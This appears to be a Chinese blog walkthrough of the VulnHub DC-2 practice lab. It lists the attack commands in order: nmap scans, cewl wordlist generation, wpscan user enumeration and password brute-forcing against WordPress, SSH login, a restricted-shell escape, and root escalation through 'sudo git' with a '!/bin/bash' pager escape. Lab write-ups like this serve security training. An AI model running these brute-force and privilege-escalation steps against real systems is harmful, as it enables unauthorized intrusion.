DC-2

环境搭建

下载地址:

https://download.vulnhub.com/dc/DC-2.zip.torrent

从描述中得知有5个flag。
下载好后导入虚拟机
DC-2
修改网络配置为NAT
DC-2

探测靶机

nmap扫描一波

nmap -sP 192.168.164.0/24

DC-2
确认靶机IP为192.168.164.179
提示要修改host文件
DC-2
DC-2
成功访问
DC-2
使用nmap扫描开放的端口

nmap -A -sS -sV -v -p- 192.168.164.179

开启了80和7744端口
DC-2

挖掘信息

该网站有一个flag界面,点开查看提示
DC-2
第一可能需要用cewl爬虫收集网站信息,第二这是一个wordpress网站。
DC-2
根据flag1的提示使用命令:

cewl http://dc-2/ -w 1.txt

DC-2

爆破登录端口

由于知道这是一个wordpress的cms搭建的网站,使用wpscan扫描一波,枚举一下用户名

wpscan --url http://dc-2/ -eu

得到3个用户名
DC-2
将获得的用户名保存到2.txt文件中
开始用wpscan启动爆破功能最后跑出几个账号出来

wpscan -–url http://dc-2/ -U 2.txt -P 1.txt

获得两个用户名的密码
DC-2
登录后台
DC-2
使用jerry登录后发现flag2
DC-2
DC-2

登录SSH端口

尝试用得到的账号连接ssh
jerry连接失败
DC-2
tom连接成功
DC-2
权限太少,无论输入啥都是-rbash:
DC-2
成功解决此问题
DC-2
ls查看当前目录,存在flag3.txt,直接读取
DC-2
返回/home目录下进入jerry目录下,发现flag4.txt,直接读取
DC-2

提权

tom无权限
DC-2
切换成jerry可以找点东西
可以以root权限运行/usr/bin/git文件
DC-2

sudo git help config
	!/bin/bash或者!'sh'完成提权

sudo git  -p help
	!/bin/bash

DC-2
到root目录下获得最终flag
DC-2

上一篇:Golang图片库gg使用示例


下一篇:Java 同步代码块 - Synchronized Blocks